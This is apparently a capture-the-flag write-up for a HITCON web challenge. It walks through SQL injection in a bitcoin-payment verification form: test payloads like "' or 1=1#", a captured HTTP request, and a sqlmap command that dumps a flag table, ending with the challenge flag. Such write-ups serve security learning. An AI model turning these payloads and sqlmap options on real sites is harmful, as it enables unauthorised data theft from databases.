Are you rich? Buy the flag!Solution:
http://52.197.140.254/are_you_rich/
ps. You should NOT pay anything for this challenge
Some error messages which is non-related to challenge have been removed
1. Access to website have 2 functions, Get our bitcoin address and Verify payment.
2. Try to get our bitcoin address, It will generate some Bitcoin Address and go to verify it.
3. Not have enough money, I guess after get our bitcoin it may insert this bitcoin into database and have verify payment to check. I try to SQL Injection in Address field.
4. ' or 1=1# --- Found more than 1 records?
5. ' or 1=2# --- does not have enough confirmed money?
4. Confirm the parameter address have vulnerable to SQL Injection, I use Burp Suite to capture HTTP request and copy it to text file.
POST /are_you_rich/verify.php?address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c HTTP/1.1 Host: 52.197.140.254 Proxy-Connection: keep-alive Content-Length: 79 Cache-Control: max-age=0 Origin: http://52.197.140.254 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Referer: http://52.197.140.254/are_you_rich/verify.php?address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c Accept-Encoding: gzip, deflate Accept-Language: th,en;q=0.8 address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c&flag_id=flag1&submit=
5. Using SQLmap -r option to Load HTTP request from a text file, SQLmap verify this vulnerable is Time-Based Blind SQL Injection, and final SQLmap option that use for get a flag.
python sqlmap.py -r web50.txt -p address --threads=5 --technique=T --dbms=mysql --dbs --string="Found more than" -D areyourich -T flag1 -C flag --dump
6. Wait a several minute to retrieve a flag.
In Burp Suite (Union Based)
Flag: hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!}